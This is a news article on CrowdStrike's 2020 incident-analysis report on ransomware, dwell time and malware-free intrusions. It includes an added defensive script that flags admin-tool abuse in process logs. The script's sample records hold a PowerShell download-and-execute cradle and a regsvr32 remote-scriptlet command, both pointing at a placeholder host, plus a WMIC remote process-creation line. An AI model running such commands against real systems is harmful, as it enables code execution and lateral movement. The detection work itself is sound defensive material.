Ransomware Makes Up Half of All Major Incidents

Misconfigurations and lack of visibility allow attackers to compromise networks and monetize their intrusions, according to CrowdStrike's analysis of about 200 incidents.

Ransomware attacks made up the majority of serious cyber intrusions this year, accounting for 51% of all incidents investigated by CrowdStrike in 2020, according to the company's yearly incident-analysis report.

Financially motivated crimes accounted for 63% of the more than 200 incidents the company investigated on behalf of new and existing clients, the firm states in its "CrowdStrike Services Cyber Front Lines" report. Of those, 81% — or 51% of all incidents — saw the deployment of ransomware or tools that typically result in a ransomware infection, the company says.


The data underscores that cybercriminals have completed their change in direction, from attacks that focus on stealing personally identifiable information (PII) to sell online, to disrupting corporate operations to score a six- or seven-digit ransom, says Shawn Henry, president of CrowdStrike Services and chief security officer for the company.

"The theft of data is bad, but what we are seeing now, the disruption of operations and destruction of data, is a whole new dynamic, and it really creates critical concerns for companies," he says. "We have seen companies shut down for weeks or months, or at least part of their network, ... so the impact on operations is significantly more critical than the theft of PII."

CrowdStrike's analysis of incidents also finds that both attackers and defenders have become more sophisticated. The number of days that attackers have been able to operate inside a victim's network without detection — known as the dwell time — declined to 79 days in 2020, down from 95 days in 2019. Defenders detected 46% of attacks within a week of compromise, up from 29% in 2019. 

Yet attackers' capabilities improved as well. Attackers evaded antivirus defenses outright in 40% of the incidents, and in another 30% their activity escaped notice because the defender had misconfigured the antivirus or never fully deployed it, CrowdStrike states in its report.

"This data highlights ... the need to not just buy a security product, but actually invest in ensuring comprehensive coverage in your environment and proper configuration, tuning and integrating it into your security operations program to mitigate even the most sophisticated attacks," the report states.
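The report's point is that an endpoint product only protects hosts on which the agent is actually installed, checking in, and enforcing a blocking policy. The following reconciliation script is an added example, not CrowdStrike's code or tooling: it compares a constructed asset inventory against a constructed agent-console export and lists the hosts that are unprotected in practice. The field names (`host`, `last_seen`, `policy`) and the staleness threshold are assumptions chosen for the illustration, not any vendor's schema.

```python
"""Reconcile an asset inventory against endpoint-protection agent telemetry.

Added illustration, not CrowdStrike's code. The inventories below are
constructed sample data; the field names and the 7-day staleness window
are assumptions for the example.
"""
from datetime import datetime, timedelta

# Constructed: CMDB export of every host that is supposed to be protected.
ASSETS = ["web01", "web02", "db01", "hr-laptop-07", "jump01", "build01"]

# Constructed: agent-console export. last_seen is the last check-in (ISO
# timestamp); policy is the prevention mode the agent is enforcing.
AGENTS = [
    {"host": "web01", "last_seen": "2020-12-01T09:00:00", "policy": "block"},
    {"host": "web02", "last_seen": "2020-10-15T12:00:00", "policy": "block"},       # stale
    {"host": "db01", "last_seen": "2020-12-01T08:30:00", "policy": "detect-only"},  # audit mode
    {"host": "jump01", "last_seen": "2020-12-01T08:45:00", "policy": "block"},
    {"host": "old-vm-3", "last_seen": "2020-12-01T07:00:00", "policy": "block"},    # not in CMDB
]

NOW = datetime(2020, 12, 1, 10, 0, 0)  # fixed "now" so the run is reproducible
STALE_AFTER = timedelta(days=7)        # assumed threshold for a dead agent


def coverage_gaps(assets, agents, now=NOW, stale_after=STALE_AFTER):
    """Return hosts that are unprotected in practice, grouped by reason."""
    by_host = {a["host"]: a for a in agents}
    gaps = {"missing": [], "stale": [], "detect_only": [], "unknown_host": []}
    for host in assets:
        agent = by_host.get(host)
        if agent is None:
            gaps["missing"].append(host)          # no agent ever reported
            continue
        last_seen = datetime.fromisoformat(agent["last_seen"])
        if now - last_seen > stale_after:
            gaps["stale"].append(host)            # agent installed but not checking in
        if agent["policy"] != "block":
            gaps["detect_only"].append(host)      # agent sees but does not stop
    # Agents reporting from hosts the CMDB does not know about are a
    # visibility gap in the other direction (shadow IT, forgotten VMs).
    gaps["unknown_host"] = sorted(set(by_host) - set(assets))
    return gaps


def coverage_ratio(assets, agents, now=NOW, stale_after=STALE_AFTER):
    """Fraction of inventoried hosts with a current agent in blocking mode."""
    gaps = coverage_gaps(assets, agents, now, stale_after)
    bad = set(gaps["missing"]) | set(gaps["stale"]) | set(gaps["detect_only"])
    return (len(assets) - len(bad)) / len(assets)


if __name__ == "__main__":
    for reason, hosts in coverage_gaps(ASSETS, AGENTS).items():
        print(f"{reason}: {hosts}")
    print(f"effective coverage: {coverage_ratio(ASSETS, AGENTS):.0%}")
```

On the sample data the console would report five agents for six assets, which looks like reasonable coverage; the reconciliation shows only two of the six hosts are actually protected, which is the gap the report is describing.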

Ransomware's ability to disrupt operations has made it the most notorious threat facing companies, especially since the WannaCry and NotPetya global cyberattacks of 2017. Now, more than three years after those attacks caused billions of dollars in damage, ransomware has become the most common way that attackers attempt to monetize a compromise.

In 2020, ransomware groups became much more aggressive, adding data theft to encryption and publishing the stolen information if the target did not pay. Cybercriminals published data exfiltrated from more than 500 companies in the third quarter of 2020 alone, according to CrowdStrike.

The attacks investigated by CrowdStrike also continued to move away from bespoke and commercial malware toward administrative tools that are already present on the system, the so-called malware-free or living-off-the-land approach. The share of attacks using only malware declined from 49% in 2019 to 42% in 2020, while attacks that used no malware at all rose to 24% from 22% in 2019.
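A malware-free intrusion leaves no binary for antivirus to match, so it has to be caught in process telemetry: legitimate tools invoked in ways an administrator rarely uses them. The script below is an added example, not CrowdStrike's code or detection content. It runs a few illustrative heuristics over constructed process-creation records in a simplified "parent|image|command line" format (an assumption for the example, not any vendor's real log schema), and decodes PowerShell's `-EncodedCommand` payload so an analyst can see what was actually run. The hostname and URL in the sample lines are placeholders.

```python
"""Flag suspicious use of built-in administrative tools in process-creation logs.

Added illustration, not CrowdStrike's code. The records below are constructed;
the "parent|image|command line" layout and the heuristics are assumptions for
the example, not a vendor schema or a complete rule set.
"""
import base64
import re

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed payload; real intrusions use the same encoding trick to hide
# a download cradle from casual log review.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample records: parent process | image path | command line.
LOG_LINES = [
    "services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    f"explorer.exe|{PS}|powershell.exe Get-Process",
    f"winword.exe|{PS}|powershell.exe -nop -w hidden -enc {ENC}",
    'cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic /node:fileserver01 process call create "cmd.exe /c whoami"',
    "explorer.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL",
    "cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32 /s /u /i:http://example.test/x.sct scrobj.dll",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_powershell_enc(cmdline):
    """Return the decoded -e/-enc/-EncodedCommand payload, or None if absent."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        # PowerShell expects base64 over the UTF-16LE bytes of the script.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(record):
    """Return the reasons this record looks like admin-tool abuse (empty = nothing notable)."""
    parent, image, cmdline = record.split("|", 2)
    parent = parent.lower()
    exe = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    reasons = []
    if exe == "powershell.exe":
        if "-w hidden" in low or "windowstyle hidden" in low:
            reasons.append("powershell: hidden window")
        decoded = decode_powershell_enc(cmdline)
        if decoded is not None:
            reasons.append(f"powershell: encoded command -> {decoded}")
        if parent in OFFICE_PARENTS:
            reasons.append(f"powershell: spawned by Office application {parent}")
    elif exe == "wmic.exe" and "process call create" in low:
        reasons.append("wmic: process creation via WMI (lateral movement pattern)")
    elif exe == "regsvr32.exe" and ("/i:http" in low or "scrobj.dll" in low):
        reasons.append("regsvr32: scriptlet loaded from a URL")
    return reasons


def scan(log_text):
    """Run classify() over every line; return (line_no, reasons) for each hit."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            reasons = classify(line)
            if reasons:
                hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    for n, reasons in scan("\n".join(LOG_LINES)):
        print(f"line {n}:")
        for r in reasons:
            print(f"  {r}")
```

Note what does not fire: an interactive `Get-Process` and `rundll32.exe` opening a Control Panel applet are everyday administration. The signal is in the combination of parent, tool and arguments, which is exactly the context a file-scanning antivirus does not see.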

Detecting attacks has also become harder because more security analysts are working from home, the company states. In a previous report, CrowdStrike found that 56% of security professionals reported working from home more often during the pandemic. Companies have responded by moving away from on-premises security tooling toward cloud-delivered security services, the company says.

The CrowdStrike report also found that attackers keep coming back to the same companies: 68% of organizations faced a second attack within 12 months of their initial incident. While the US has become more proactive in disrupting attackers' activities under its Defend Forward doctrine, until cyber operators are arrested they will continue to learn from their failed attacks, says Henry, a former special agent with the FBI.

"Information security is not unlike physical security," he says. "If you think about the physical world, and you have bank robbers, they are going to keep going until they get caught. It is similar here with these actors. Until you actually stop the actors, this will continue."
